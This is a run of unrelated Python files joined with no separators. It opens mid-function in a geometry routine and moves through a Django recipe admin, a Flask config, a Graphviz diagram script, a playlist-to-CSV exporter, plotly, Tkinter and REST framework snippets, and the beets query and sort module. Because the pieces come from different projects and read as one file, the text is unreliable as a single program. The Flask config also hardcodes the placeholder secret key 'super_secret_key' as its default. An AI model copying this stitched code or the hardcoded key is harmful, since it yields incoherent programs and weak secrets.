    planes = at.PlaneSet(planes)
    
    angles = np.zeros(len(lines))
    adjusted_lines = np.zeros_like(lines)
    for i, (line, plane) in enumerate(zip(lines, planes)):
        cos_theta = np.dot(line, plane)
        angles[i] = pi/2. - acos(cos_theta)
        adjusted_line = line - line*cos_theta
        adjusted_lines[i] = adjusted_line/sqrt(np.dot(adjusted_line,
                                                      adjusted_line))
    return adjusted_lines, angles

from django.contrib import admin

# Register your models here.
from rcps.models import *


class IngredientToRecipeInline(admin.TabularInline):
    model = Ingredient.recipes.through
    verbose_name = 'Ингредиент'
    verbose_name_plural = 'Ингредиенты'


class EquipmentInline(admin.TabularInline):
    model = Equipment.equipment_recipes.through
    verbose_name = 'Инструмент'
    verbose_name_plural = 'Инструменты'


class TagInline(admin.TabularInline):
    model = Tag.tag_recipes.through
    verbose_name = 'Тег'
    verbose_name_plural = 'Теги'


class RecipeAdmin(admin.ModelAdmin):
    model = Recipe
    fields = ['recipe_name', 'recipe_link']
    inlines = (
        IngredientToRecipeInline,
        EquipmentInline,
        TagInline,
    )


class IngredientComponentInAlternativeInline(admin.TabularInline):
    model = IngredientAlternative.ingredients.through
    verbose_name = 'Ингредиент'
    verbose_name_plural = 'Ингредиенты'


class IngredientAlternativeAdmin(admin.ModelAdmin):
    model = IngredientAlternative
    inlines = (
        IngredientComponentInAlternativeInline,
    )


admin.site.register(Recipe, RecipeAdmin)
admin.site.register(Ingredient)
admin.site.register(IngredientAlternative, IngredientAlternativeAdmin)
admin.site.register(IngredientCategory)
admin.site.register(Equipment)
admin.site.register(EquipmentCategory)
admin.site.register(IngredientReplacement)
admin.site.register(Tag)
import os

class Config(object):
    DEBUG = False
    TESTING = False
    CSRF_ENABLED = True
    SECRET_KEY = "super_secret_key"
    SQLALCHEMY_DATABASE_URI = os.environ['DATABASE_URL']

class ProductionConfig(Config):
    DEBUG = False
    SECRET_KEY = os.environ['SECRET_KEY']

class DevelopmentConfig(Config):
    DEVELOPMENT = True
    DEBUG = True

class TestingConfig(Config):
    TESTING = True

r"""
Create MapServer class diagrams

Requires https://graphviz.gitlab.io/_pages/Download/Download_windows.html
https://stackoverflow.com/questions/1494492/graphviz-how-to-go-from-dot-to-a-graph

For DOT languge see http://www.graphviz.org/doc/info/attrs.html

cd C:\Program Files (x86)\Graphviz2.38\bin
dot -Tpng D:\GitHub\mappyfile\mapfile_classes.dot -o outfile.png
outfile.png

For Entity Relationship diagrams:

https://graphviz.readthedocs.io/en/stable/examples.html#er-py

"""

import os
import pydot
# import pprint


FONT = "Lucida Sans"


def graphviz_setup(gviz_path):
    os.environ['PATH'] = gviz_path + ";" + os.environ['PATH']


def add_child(graph, child_id, child_label, parent_id, colour):
    """
    http://www.graphviz.org/doc/info/shapes.html#polygon
    """
    node = pydot.Node(child_id, style="filled", fillcolor=colour, label=child_label, shape="polygon", fontname=FONT)
    graph.add_node(node)
    graph.add_edge(pydot.Edge(parent_id, node))


def add_children(graph, parent_id, d, level=0):

    blue = "#6b6bd1"
    white = "#fdfefd"
    green = "#33a333"
    colours = [blue, white, green] * 3

    for class_, children in d.items():
        colour = colours[level]
        child_label = class_
        child_id = parent_id + "_" + class_
        add_child(graph, child_id, child_label, parent_id, colour)
        add_children(graph, child_id, children, level+1)


def save_file(graph, fn):
    filename = "%s.png" % fn
    graph.write_png(filename)
    graph.write("%s.dot" % fn)
    os.startfile(filename)


def main(gviz_path, layer_only=False):

    graphviz_setup(gviz_path)
    graph = pydot.Dot(graph_type='digraph', rankdir="TB")

    layer_children = {
            'CLASS': {
                'LABEL': {'STYLE': {}},
                'CONNECTIONOPTIONS': {},
                'LEADER': {'STYLE': {}},
                'STYLE': {},
                'VALIDATION': {}
            },
            'CLUSTER': {},
            'COMPOSITE': {},
            'FEATURE': {'POINTS': {}},
            'GRID': {},
            'JOIN': {},
            'METADATA': {},
            'PROJECTION': {},
            'SCALETOKEN': {'VALUES': {}},
            'VALIDATION': {}
     }

    # pprint.pprint(layer_children)

    classes = {
        "MAP": {
            "LAYER": layer_children,
            'LEGEND': {'LABEL': {}},
            'PROJECTION': {},
            'QUERYMAP': {},
            'REFERENCE': {},
            'SCALEBAR': {'LABEL': {}},
            'SYMBOL': {},
            'WEB': {'METADATA': {}, 'VALIDATION': {}}
        }
     }

    if layer_only:
        root = "LAYER"
        classes = classes["MAP"]
        fn = "layer_classes"
    else:
        fn = "map_classes"
        root,  = classes.keys()

    node = pydot.Node(root, style="filled", fillcolor="#33a333", label=root, fontname=FONT, shape="polygon")
    graph.add_node(node)
    add_children(graph, root, classes[root])
    save_file(graph, fn)


if __name__ == "__main__":
    gviz_path = r"C:\Program Files (x86)\Graphviz2.38\bin"
    main(gviz_path, True)
    main(gviz_path, False)
    print("Done!")

# Author: John Elkins <john.elkins@yahoo.com>
# License: MIT <LICENSE>

from common import *

if len(sys.argv) < 2:
    log('ERROR output directory is required')
    time.sleep(3)
    exit()

# setup the output directory, create it if needed
output_dir = sys.argv[1]
if not os.path.exists(output_dir):
    os.makedirs(output_dir)

# log in and load personal library
api = open_api()
library = load_personal_library()

def playlist_handler(playlist_name, playlist_description, playlist_tracks):
    # skip empty and no-name playlists
    if not playlist_name: return
    if len(playlist_tracks) == 0: return

    # setup output files
    playlist_name = playlist_name.replace('/', '')
    open_log(os.path.join(output_dir,playlist_name+u'.log'))
    outfile = codecs.open(os.path.join(output_dir,playlist_name+u'.csv'),
        encoding='utf-8',mode='w')

    # keep track of stats
    stats = create_stats()
    export_skipped = 0
    # keep track of songids incase we need to skip duplicates
    song_ids = []

    log('')
    log('============================================================')
    log(u'Exporting '+ unicode(len(playlist_tracks)) +u' tracks from '
        +playlist_name)
    log('============================================================')

    # add the playlist description as a "comment"
    if playlist_description:
        outfile.write(tsep)
        outfile.write(playlist_description)
        outfile.write(os.linesep)

    for tnum, pl_track in enumerate(playlist_tracks):
        track = pl_track.get('track')

        # we need to look up these track in the library
        if not track:
            library_track = [
                item for item in library if item.get('id')
                in pl_track.get('trackId')]
            if len(library_track) == 0:
                log(u'!! '+str(tnum+1)+repr(pl_track))
                export_skipped += 1
                continue
            track = library_track[0]

        result_details = create_result_details(track)

        if not allow_duplicates and result_details['songid'] in song_ids:
            log('{D} '+str(tnum+1)+'. '+create_details_string(result_details,True))
            export_skipped += 1
            continue

        # update the stats
        update_stats(track,stats)

        # export the track
        song_ids.append(result_details['songid'])
        outfile.write(create_details_string(result_details))
        outfile.write(os.linesep)

    # calculate the stats
    stats_results = calculate_stats_results(stats,len(playlist_tracks))

    # output the stats to the log
    log('')
    log_stats(stats_results)
    log(u'export skipped: '+unicode(export_skipped))

    # close the files
    close_log()
    outfile.close()

# the personal library is used so we can lookup tracks that fail to return
# info from the ...playlist_contents() call

playlist_contents = api.get_all_user_playlist_contents()

for playlist in playlist_contents:
    playlist_name = playlist.get('name')
    playlist_description = playlist.get('description')
    playlist_tracks = playlist.get('tracks')

    playlist_handler(playlist_name, playlist_description, playlist_tracks)

if export_thumbs_up:
    # get thumbs up playlist
    thumbs_up_tracks = []
    for track in library:
        if track.get('rating') is not None and int(track.get('rating')) > 1:
            thumbs_up_tracks.append(track)


    # modify format of each dictionary to match the data type
    # of the other playlists
    thumbs_up_tracks_formatted = []
    for t in thumbs_up_tracks:
        thumbs_up_tracks_formatted.append({'track': t})

    playlist_handler('Thumbs up', 'Thumbs up tracks', thumbs_up_tracks_formatted)

if export_all:
    all_tracks_formatted = []
    for t in library:
        all_tracks_formatted.append({'track': t})

    playlist_handler('All', 'All tracks', all_tracks_formatted)

close_api()
    

import _plotly_utils.basevalidators


class ShowexponentValidator(_plotly_utils.basevalidators.EnumeratedValidator):
    def __init__(
        self,
        plotly_name="showexponent",
        parent_name="scatterpolar.marker.colorbar",
        **kwargs
    ):
        super(ShowexponentValidator, self).__init__(
            plotly_name=plotly_name,
            parent_name=parent_name,
            edit_type=kwargs.pop("edit_type", "colorbars"),
            values=kwargs.pop("values", ["all", "first", "last", "none"]),
            **kwargs
        )

__author__ = 'miko'
from Tkinter import Frame


class GameState(Frame):
	def __init__(self, *args, **kwargs):
		self.stateName = kwargs["stateName"]
		self.root = args[0]
		self.id = kwargs["id"]
		Frame.__init__(self, self.root.mainWindow)
		self.config(
			background="gold"
		)
		self.place(relwidth=1, relheight=1)

from csacompendium.csa_practice.models import PracticeLevel
from csacompendium.utils.pagination import APILimitOffsetPagination
from csacompendium.utils.permissions import IsOwnerOrReadOnly
from csacompendium.utils.viewsutils import DetailViewUpdateDelete, CreateAPIViewHook
from rest_framework.filters import DjangoFilterBackend
from rest_framework.generics import CreateAPIView, ListAPIView
from rest_framework.permissions import IsAuthenticated, IsAdminUser
from .filters import PracticeLevelListFilter
from csacompendium.csa_practice.api.practicelevel.practicelevelserializers import practice_level_serializers


def practice_level_views():
    """
    Practice level views
    :return: All practice level views
    :rtype: Object
    """
    practice_level_serializer = practice_level_serializers()

    class PracticeLevelCreateAPIView(CreateAPIViewHook):
        """
        Creates a single record.
        """
        queryset = PracticeLevel.objects.all()
        serializer_class = practice_level_serializer['PracticeLevelDetailSerializer']
        permission_classes = [IsAuthenticated]

    class PracticeLevelListAPIView(ListAPIView):
        """
        API list view. Gets all records API.
        """
        queryset = PracticeLevel.objects.all()
        serializer_class = practice_level_serializer['PracticeLevelListSerializer']
        filter_backends = (DjangoFilterBackend,)
        filter_class = PracticeLevelListFilter
        pagination_class = APILimitOffsetPagination

    class PracticeLevelDetailAPIView(DetailViewUpdateDelete):
        """
        Updates a record.
        """
        queryset = PracticeLevel.objects.all()
        serializer_class = practice_level_serializer['PracticeLevelDetailSerializer']
        permission_classes = [IsAuthenticated, IsAdminUser]
        lookup_field = 'slug'

    return {
        'PracticeLevelListAPIView': PracticeLevelListAPIView,
        'PracticeLevelDetailAPIView': PracticeLevelDetailAPIView,
        'PracticeLevelCreateAPIView': PracticeLevelCreateAPIView
    }

# This file is part of beets.
# Copyright 2016, Adrian Sampson.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.

"""The Query type hierarchy for DBCore.
"""

import re
from operator import mul
from beets import util
from datetime import datetime, timedelta
import unicodedata
from functools import reduce


class ParsingError(ValueError):
    """Abstract class for any unparseable user-requested album/query
    specification.
    """


class InvalidQueryError(ParsingError):
    """Represent any kind of invalid query.

    The query should be a unicode string or a list, which will be space-joined.
    """

    def __init__(self, query, explanation):
        if isinstance(query, list):
            query = " ".join(query)
        message = f"'{query}': {explanation}"
        super().__init__(message)


class InvalidQueryArgumentValueError(ParsingError):
    """Represent a query argument that could not be converted as expected.

    It exists to be caught in upper stack levels so a meaningful (i.e. with the
    query) InvalidQueryError can be raised.
    """

    def __init__(self, what, expected, detail=None):
        message = f"'{what}' is not {expected}"
        if detail:
            message = f"{message}: {detail}"
        super().__init__(message)


class Query:
    """An abstract class representing a query into the item database.
    """

    def clause(self):
        """Generate an SQLite expression implementing the query.

        Return (clause, subvals) where clause is a valid sqlite
        WHERE clause implementing the query and subvals is a list of
        items to be substituted for ?s in the clause.
        """
        return None, ()

    def match(self, item):
        """Check whether this query matches a given Item. Can be used to
        perform queries on arbitrary sets of Items.
        """
        raise NotImplementedError

    def __repr__(self):
        return f"{self.__class__.__name__}()"

    def __eq__(self, other):
        return type(self) == type(other)

    def __hash__(self):
        return 0


class FieldQuery(Query):
    """An abstract query that searches in a specific field for a
    pattern. Subclasses must provide a `value_match` class method, which
    determines whether a certain pattern string matches a certain value
    string. Subclasses may also provide `col_clause` to implement the
    same matching functionality in SQLite.
    """

    def __init__(self, field, pattern, fast=True):
        self.field = field
        self.pattern = pattern
        self.fast = fast

    def col_clause(self):
        return None, ()

    def clause(self):
        if self.fast:
            return self.col_clause()
        else:
            # Matching a flexattr. This is a slow query.
            return None, ()

    @classmethod
    def value_match(cls, pattern, value):
        """Determine whether the value matches the pattern. Both
        arguments are strings.
        """
        raise NotImplementedError()

    def match(self, item):
        return self.value_match(self.pattern, item.get(self.field))

    def __repr__(self):
        return ("{0.__class__.__name__}({0.field!r}, {0.pattern!r}, "
                "{0.fast})".format(self))

    def __eq__(self, other):
        return super().__eq__(other) and \
            self.field == other.field and self.pattern == other.pattern

    def __hash__(self):
        return hash((self.field, hash(self.pattern)))


class MatchQuery(FieldQuery):
    """A query that looks for exact matches in an item field."""

    def col_clause(self):
        return self.field + " = ?", [self.pattern]

    @classmethod
    def value_match(cls, pattern, value):
        return pattern == value


class NoneQuery(FieldQuery):
    """A query that checks whether a field is null."""

    def __init__(self, field, fast=True):
        super().__init__(field, None, fast)

    def col_clause(self):
        return self.field + " IS NULL", ()

    def match(self, item):
        return item.get(self.field) is None

    def __repr__(self):
        return "{0.__class__.__name__}({0.field!r}, {0.fast})".format(self)


class StringFieldQuery(FieldQuery):
    """A FieldQuery that converts values to strings before matching
    them.
    """

    @classmethod
    def value_match(cls, pattern, value):
        """Determine whether the value matches the pattern. The value
        may have any type.
        """
        return cls.string_match(pattern, util.as_string(value))

    @classmethod
    def string_match(cls, pattern, value):
        """Determine whether the value matches the pattern. Both
        arguments are strings. Subclasses implement this method.
        """
        raise NotImplementedError()


class StringQuery(StringFieldQuery):
    """A query that matches a whole string in a specific item field."""

    def col_clause(self):
        search = (self.pattern
                  .replace('\\', '\\\\')
                  .replace('%', '\\%')
                  .replace('_', '\\_'))
        clause = self.field + " like ? escape '\\'"
        subvals = [search]
        return clause, subvals

    @classmethod
    def string_match(cls, pattern, value):
        return pattern.lower() == value.lower()


class SubstringQuery(StringFieldQuery):
    """A query that matches a substring in a specific item field."""

    def col_clause(self):
        pattern = (self.pattern
                   .replace('\\', '\\\\')
                   .replace('%', '\\%')
                   .replace('_', '\\_'))
        search = '%' + pattern + '%'
        clause = self.field + " like ? escape '\\'"
        subvals = [search]
        return clause, subvals

    @classmethod
    def string_match(cls, pattern, value):
        return pattern.lower() in value.lower()


class RegexpQuery(StringFieldQuery):
    """A query that matches a regular expression in a specific item
    field.

    Raises InvalidQueryError when the pattern is not a valid regular
    expression.
    """

    def __init__(self, field, pattern, fast=True):
        super().__init__(field, pattern, fast)
        pattern = self._normalize(pattern)
        try:
            self.pattern = re.compile(self.pattern)
        except re.error as exc:
            # Invalid regular expression.
            raise InvalidQueryArgumentValueError(pattern,
                                                 "a regular expression",
                                                 format(exc))

    @staticmethod
    def _normalize(s):
        """Normalize a Unicode string's representation (used on both
        patterns and matched values).
        """
        return unicodedata.normalize('NFC', s)

    @classmethod
    def string_match(cls, pattern, value):
        return pattern.search(cls._normalize(value)) is not None


class BooleanQuery(MatchQuery):
    """Matches a boolean field. Pattern should either be a boolean or a
    string reflecting a boolean.
    """

    def __init__(self, field, pattern, fast=True):
        super().__init__(field, pattern, fast)
        if isinstance(pattern, str):
            self.pattern = util.str2bool(pattern)
        self.pattern = int(self.pattern)


class BytesQuery(MatchQuery):
    """Match a raw bytes field (i.e., a path). This is a necessary hack
    to work around the `sqlite3` module's desire to treat `bytes` and
    `unicode` equivalently in Python 2. Always use this query instead of
    `MatchQuery` when matching on BLOB values.
    """

    def __init__(self, field, pattern):
        super().__init__(field, pattern)

        # Use a buffer/memoryview representation of the pattern for SQLite
        # matching. This instructs SQLite to treat the blob as binary
        # rather than encoded Unicode.
        if isinstance(self.pattern, (str, bytes)):
            if isinstance(self.pattern, str):
                self.pattern = self.pattern.encode('utf-8')
            self.buf_pattern = memoryview(self.pattern)
        elif isinstance(self.pattern, memoryview):
            self.buf_pattern = self.pattern
            self.pattern = bytes(self.pattern)

    def col_clause(self):
        return self.field + " = ?", [self.buf_pattern]


class NumericQuery(FieldQuery):
    """Matches numeric fields. A syntax using Ruby-style range ellipses
    (``..``) lets users specify one- or two-sided ranges. For example,
    ``year:2001..`` finds music released since the turn of the century.

    Raises InvalidQueryError when the pattern does not represent an int or
    a float.
    """

    def _convert(self, s):
        """Convert a string to a numeric type (float or int).

        Return None if `s` is empty.
        Raise an InvalidQueryError if the string cannot be converted.
        """
        # This is really just a bit of fun premature optimization.
        if not s:
            return None
        try:
            return int(s)
        except ValueError:
            try:
                return float(s)
            except ValueError:
                raise InvalidQueryArgumentValueError(s, "an int or a float")

    def __init__(self, field, pattern, fast=True):
        super().__init__(field, pattern, fast)

        parts = pattern.split('..', 1)
        if len(parts) == 1:
            # No range.
            self.point = self._convert(parts[0])
            self.rangemin = None
            self.rangemax = None
        else:
            # One- or two-sided range.
            self.point = None
            self.rangemin = self._convert(parts[0])
            self.rangemax = self._convert(parts[1])

    def match(self, item):
        if self.field not in item:
            return False
        value = item[self.field]
        if isinstance(value, str):
            value = self._convert(value)

        if self.point is not None:
            return value == self.point
        else:
            if self.rangemin is not None and value < self.rangemin:
                return False
            if self.rangemax is not None and value > self.rangemax:
                return False
            return True

    def col_clause(self):
        if self.point is not None:
            return self.field + '=?', (self.point,)
        else:
            if self.rangemin is not None and self.rangemax is not None:
                return ('{0} >= ? AND {0} <= ?'.format(self.field),
                        (self.rangemin, self.rangemax))
            elif self.rangemin is not None:
                return f'{self.field} >= ?', (self.rangemin,)
            elif self.rangemax is not None:
                return f'{self.field} <= ?', (self.rangemax,)
            else:
                return '1', ()


class CollectionQuery(Query):
    """An abstract query class that aggregates other queries. Can be
    indexed like a list to access the sub-queries.
    """

    def __init__(self, subqueries=()):
        self.subqueries = subqueries

    # Act like a sequence.

    def __len__(self):
        return len(self.subqueries)

    def __getitem__(self, key):
        return self.subqueries[key]

    def __iter__(self):
        return iter(self.subqueries)

    def __contains__(self, item):
        return item in self.subqueries

    def clause_with_joiner(self, joiner):
        """Return a clause created by joining together the clauses of
        all subqueries with the string joiner (padded by spaces).
        """
        clause_parts = []
        subvals = []
        for subq in self.subqueries:
            subq_clause, subq_subvals = subq.clause()
            if not subq_clause:
                # Fall back to slow query.
                return None, ()
            clause_parts.append('(' + subq_clause + ')')
            subvals += subq_subvals
        clause = (' ' + joiner + ' ').join(clause_parts)
        return clause, subvals

    def __repr__(self):
        return "{0.__class__.__name__}({0.subqueries!r})".format(self)

    def __eq__(self, other):
        return super().__eq__(other) and \
            self.subqueries == other.subqueries

    def __hash__(self):
        """Since subqueries are mutable, this object should not be hashable.
        However and for conveniences purposes, it can be hashed.
        """
        return reduce(mul, map(hash, self.subqueries), 1)


class AnyFieldQuery(CollectionQuery):
    """A query that matches if a given FieldQuery subclass matches in
    any field. The individual field query class is provided to the
    constructor.
    """

    def __init__(self, pattern, fields, cls):
        self.pattern = pattern
        self.fields = fields
        self.query_class = cls

        subqueries = []
        for field in self.fields:
            subqueries.append(cls(field, pattern, True))
        super().__init__(subqueries)

    def clause(self):
        return self.clause_with_joiner('or')

    def match(self, item):
        for subq in self.subqueries:
            if subq.match(item):
                return True
        return False

    def __repr__(self):
        return ("{0.__class__.__name__}({0.pattern!r}, {0.fields!r}, "
                "{0.query_class.__name__})".format(self))

    def __eq__(self, other):
        return super().__eq__(other) and \
            self.query_class == other.query_class

    def __hash__(self):
        return hash((self.pattern, tuple(self.fields), self.query_class))


class MutableCollectionQuery(CollectionQuery):
    """A collection query whose subqueries may be modified after the
    query is initialized.
    """

    def __setitem__(self, key, value):
        self.subqueries[key] = value

    def __delitem__(self, key):
        del self.subqueries[key]


class AndQuery(MutableCollectionQuery):
    """A conjunction of a list of other queries."""

    def clause(self):
        return self.clause_with_joiner('and')

    def match(self, item):
        return all(q.match(item) for q in self.subqueries)


class OrQuery(MutableCollectionQuery):
    """A conjunction of a list of other queries."""

    def clause(self):
        return self.clause_with_joiner('or')

    def match(self, item):
        return any(q.match(item) for q in self.subqueries)


class NotQuery(Query):
    """A query that matches the negation of its `subquery`, as a shorcut for
    performing `not(subquery)` without using regular expressions.
    """

    def __init__(self, subquery):
        self.subquery = subquery

    def clause(self):
        clause, subvals = self.subquery.clause()
        if clause:
            return f'not ({clause})', subvals
        else:
            # If there is no clause, there is nothing to negate. All the logic
            # is handled by match() for slow queries.
            return clause, subvals

    def match(self, item):
        return not self.subquery.match(item)

    def __repr__(self):
        return "{0.__class__.__name__}({0.subquery!r})".format(self)

    def __eq__(self, other):
        return super().__eq__(other) and \
            self.subquery == other.subquery

    def __hash__(self):
        return hash(('not', hash(self.subquery)))


class TrueQuery(Query):
    """A query that always matches."""

    def clause(self):
        return '1', ()

    def match(self, item):
        return True


class FalseQuery(Query):
    """A query that never matches."""

    def clause(self):
        return '0', ()

    def match(self, item):
        return False


# Time/date queries.

def _to_epoch_time(date):
    """Convert a `datetime` object to an integer number of seconds since
    the (local) Unix epoch.
    """
    if hasattr(date, 'timestamp'):
        # The `timestamp` method exists on Python 3.3+.
        return int(date.timestamp())
    else:
        epoch = datetime.fromtimestamp(0)
        delta = date - epoch
        return int(delta.total_seconds())


def _parse_periods(pattern):
    """Parse a string containing two dates separated by two dots (..).
    Return a pair of `Period` objects.
    """
    parts = pattern.split('..', 1)
    if len(parts) == 1:
        instant = Period.parse(parts[0])
        return (instant, instant)
    else:
        start = Period.parse(parts[0])
        end = Period.parse(parts[1])
        return (start, end)


class Period:
    """A period of time given by a date, time and precision.

    Example: 2014-01-01 10:50:30 with precision 'month' represents all
    instants of time during January 2014.
    """

    precisions = ('year', 'month', 'day', 'hour', 'minute', 'second')
    date_formats = (
        ('%Y',),  # year
        ('%Y-%m',),  # month
        ('%Y-%m-%d',),  # day
        ('%Y-%m-%dT%H', '%Y-%m-%d %H'),  # hour
        ('%Y-%m-%dT%H:%M', '%Y-%m-%d %H:%M'),  # minute
        ('%Y-%m-%dT%H:%M:%S', '%Y-%m-%d %H:%M:%S')  # second
    )
    relative_units = {'y': 365, 'm': 30, 'w': 7, 'd': 1}
    relative_re = '(?P<sign>[+|-]?)(?P<quantity>[0-9]+)' + \
        '(?P<timespan>[y|m|w|d])'

    def __init__(self, date, precision):
        """Create a period with the given date (a `datetime` object) and
        precision (a string, one of "year", "month", "day", "hour", "minute",
        or "second").
        """
        if precision not in Period.precisions:
            raise ValueError(f'Invalid precision {precision}')
        self.date = date
        self.precision = precision

    @classmethod
    def parse(cls, string):
        """Parse a date and return a `Period` object or `None` if the
        string is empty, or raise an InvalidQueryArgumentValueError if
        the string cannot be parsed to a date.

        The date may be absolute or relative. Absolute dates look like
        `YYYY`, or `YYYY-MM-DD`, or `YYYY-MM-DD HH:MM:SS`, etc. Relative
        dates have three parts:

        - Optionally, a ``+`` or ``-`` sign indicating the future or the
          past. The default is the future.
        - A number: how much to add or subtract.
        - A letter indicating the unit: days, weeks, months or years
          (``d``, ``w``, ``m`` or ``y``). A "month" is exactly 30 days
          and a "year" is exactly 365 days.
        """

        def find_date_and_format(string):
            for ord, format in enumerate(cls.date_formats):
                for format_option in format:
                    try:
                        date = datetime.strptime(string, format_option)
                        return date, ord
                    except ValueError:
                        # Parsing failed.
                        pass
            return (None, None)

        if not string:
            return None

        # Check for a relative date.
        match_dq = re.match(cls.relative_re, string)
        if match_dq:
            sign = match_dq.group('sign')
            quantity = match_dq.group('quantity')
            timespan = match_dq.group('timespan')

            # Add or subtract the given amount of time from the current
            # date.
            multiplier = -1 if sign == '-' else 1
            days = cls.relative_units[timespan]
            date = datetime.now() + \
                timedelta(days=int(quantity) * days) * multiplier
            return cls(date, cls.precisions[5])

        # Check for an absolute date.
        date, ordinal = find_date_and_format(string)
        if date is None:
            raise InvalidQueryArgumentValueError(string,
                                                 'a valid date/time string')
        precision = cls.precisions[ordinal]
        return cls(date, precision)

    def open_right_endpoint(self):
        """Based on the precision, convert the period to a precise
        `datetime` for use as a right endpoint in a right-open interval.
        """
        precision = self.precision
        date = self.date
        if 'year' == self.precision:
            return date.replace(year=date.year + 1, month=1)
        elif 'month' == precision:
            if (date.month < 12):
                return date.replace(month=date.month + 1)
            else:
                return date.replace(year=date.year + 1, month=1)
        elif 'day' == precision:
            return date + timedelta(days=1)
        elif 'hour' == precision:
            return date + timedelta(hours=1)
        elif 'minute' == precision:
            return date + timedelta(minutes=1)
        elif 'second' == precision:
            return date + timedelta(seconds=1)
        else:
            raise ValueError(f'unhandled precision {precision}')


class DateInterval:
    """A closed-open interval of dates.

    A left endpoint of None means since the beginning of time.
    A right endpoint of None means towards infinity.
    """

    def __init__(self, start, end):
        if start is not None and end is not None and not start < end:
            raise ValueError("start date {} is not before end date {}"
                             .format(start, end))
        self.start = start
        self.end = end

    @classmethod
    def from_periods(cls, start, end):
        """Create an interval with two Periods as the endpoints.
        """
        end_date = end.open_right_endpoint() if end is not None else None
        start_date = start.date if start is not None else None
        return cls(start_date, end_date)

    def contains(self, date):
        if self.start is not None and date < self.start:
            return False
        if self.end is not None and date >= self.end:
            return False
        return True

    def __str__(self):
        return f'[{self.start}, {self.end})'


class DateQuery(FieldQuery):
    """Matches date fields stored as seconds since Unix epoch time.

    Dates can be specified as ``year-month-day`` strings where only year
    is mandatory.

    The value of a date field can be matched against a date interval by
    using an ellipsis interval syntax similar to that of NumericQuery.
    """

    def __init__(self, field, pattern, fast=True):
        super().__init__(field, pattern, fast)
        start, end = _parse_periods(pattern)
        self.interval = DateInterval.from_periods(start, end)

    def match(self, item):
        if self.field not in item:
            return False
        timestamp = float(item[self.field])
        date = datetime.fromtimestamp(timestamp)
        return self.interval.contains(date)

    _clause_tmpl = "{0} {1} ?"

    def col_clause(self):
        clause_parts = []
        subvals = []

        if self.interval.start:
            clause_parts.append(self._clause_tmpl.format(self.field, ">="))
            subvals.append(_to_epoch_time(self.interval.start))

        if self.interval.end:
            clause_parts.append(self._clause_tmpl.format(self.field, "<"))
            subvals.append(_to_epoch_time(self.interval.end))

        if clause_parts:
            # One- or two-sided interval.
            clause = ' AND '.join(clause_parts)
        else:
            # Match any date.
            clause = '1'
        return clause, subvals


class DurationQuery(NumericQuery):
    """NumericQuery that allow human-friendly (M:SS) time interval formats.

    Converts the range(s) to a float value, and delegates on NumericQuery.

    Raises InvalidQueryError when the pattern does not represent an int, float
    or M:SS time interval.
    """

    def _convert(self, s):
        """Convert a M:SS or numeric string to a float.

        Return None if `s` is empty.
        Raise an InvalidQueryError if the string cannot be converted.
        """
        if not s:
            return None
        try:
            return util.raw_seconds_short(s)
        except ValueError:
            try:
                return float(s)
            except ValueError:
                raise InvalidQueryArgumentValueError(
                    s,
                    "a M:SS string or a float")


# Sorting.

class Sort:
    """An abstract class representing a sort operation for a query into
    the item database.
    """

    def order_clause(self):
        """Generates a SQL fragment to be used in a ORDER BY clause, or
        None if no fragment is used (i.e., this is a slow sort).
        """
        return None

    def sort(self, items):
        """Sort the list of objects and return a list.
        """
        return sorted(items)

    def is_slow(self):
        """Indicate whether this query is *slow*, meaning that it cannot
        be executed in SQL and must be executed in Python.
        """
        return False

    def __hash__(self):
        return 0

    def __eq__(self, other):
        return type(self) == type(other)


class MultipleSort(Sort):
    """Sort that encapsulates multiple sub-sorts.
    """

    def __init__(self, sorts=None):
        self.sorts = sorts or []

    def add_sort(self, sort):
        self.sorts.append(sort)

    def _sql_sorts(self):
        """Return the list of sub-sorts for which we can be (at least
        partially) fast.

        A contiguous suffix of fast (SQL-capable) sub-sorts are
        executable in SQL. The remaining, even if they are fast
        independently, must be executed slowly.
        """
        sql_sorts = []
        for sort in reversed(self.sorts):
            if not sort.order_clause() is None:
                sql_sorts.append(sort)
            else:
                break
        sql_sorts.reverse()
        return sql_sorts

    def order_clause(self):
        order_strings = []
        for sort in self._sql_sorts():
            order = sort.order_clause()
            order_strings.append(order)

        return ", ".join(order_strings)

    def is_slow(self):
        for sort in self.sorts:
            if sort.is_slow():
                return True
        return False

    def sort(self, items):
        slow_sorts = []
        switch_slow = False
        for sort in reversed(self.sorts):
            if switch_slow:
                slow_sorts.append(sort)
            elif sort.order_clause() is None:
                switch_slow = True
                slow_sorts.append(sort)
            else:
                pass

        for sort in slow_sorts:
            items = sort.sort(items)
        return items

    def __repr__(self):
        return f'MultipleSort({self.sorts!r})'

    def __hash__(self):
        return hash(tuple(self.sorts))

    def __eq__(self, other):
        return super().__eq__(other) and \
            self.sorts == other.sorts


class FieldSort(Sort):
    """An abstract sort criterion that orders by a specific field (of
    any kind).
    """

    def __init__(self, field, ascending=True, case_insensitive=True):
        self.field = field
        self.ascending = ascending
        self.case_insensitive = case_insensitive

    def sort(self, objs):
        # TODO: Conversion and null-detection here. In Python 3,
        # comparisons with None fail. We should also support flexible
        # attributes with different types without falling over.

        def key(item):
            field_val = item.get(self.field, '')
            if self.case_insensitive and isinstance(field_val, str):
                field_val = field_val.lower()
            return field_val

        return sorted(objs, key=key, reverse=not self.ascending)

    def __repr__(self):
        return '<{}: {}{}>'.format(
            type(self).__name__,
            self.field,
            '+' if self.ascending else '-',
        )

    def __hash__(self):
        return hash((self.field, self.ascending))

    def __eq__(self, other):
        return super().__eq__(other) and \
            self.field == other.field and \
            self.ascending == other.ascending


class FixedFieldSort(FieldSort):
    """Sort object to sort on a fixed field.
    """

    def order_clause(self):
        order = "ASC" if self.ascending else "DESC"
        if self.case_insensitive:
            field = '(CASE ' \
                    'WHEN TYPEOF({0})="text" THEN LOWER({0}) ' \
                    'WHEN TYPEOF({0})="blob" THEN LOWER({0}) ' \
                    'ELSE {0} END)'.format(self.field)
        else:
            field = self.field
        return f"{field} {order}"


class SlowFieldSort(FieldSort):
    """A sort criterion by some model field other than a fixed field:
    i.e., a computed or flexible field.
    """

    def is_slow(self):
        return True


class NullSort(Sort):
    """No sorting. Leave results unsorted."""

    def sort(self, items):
        return items

    def __nonzero__(self):
        return self.__bool__()

    def __bool__(self):
        return False

    def __eq__(self, other):
        return type(self) == type(other) or other is None

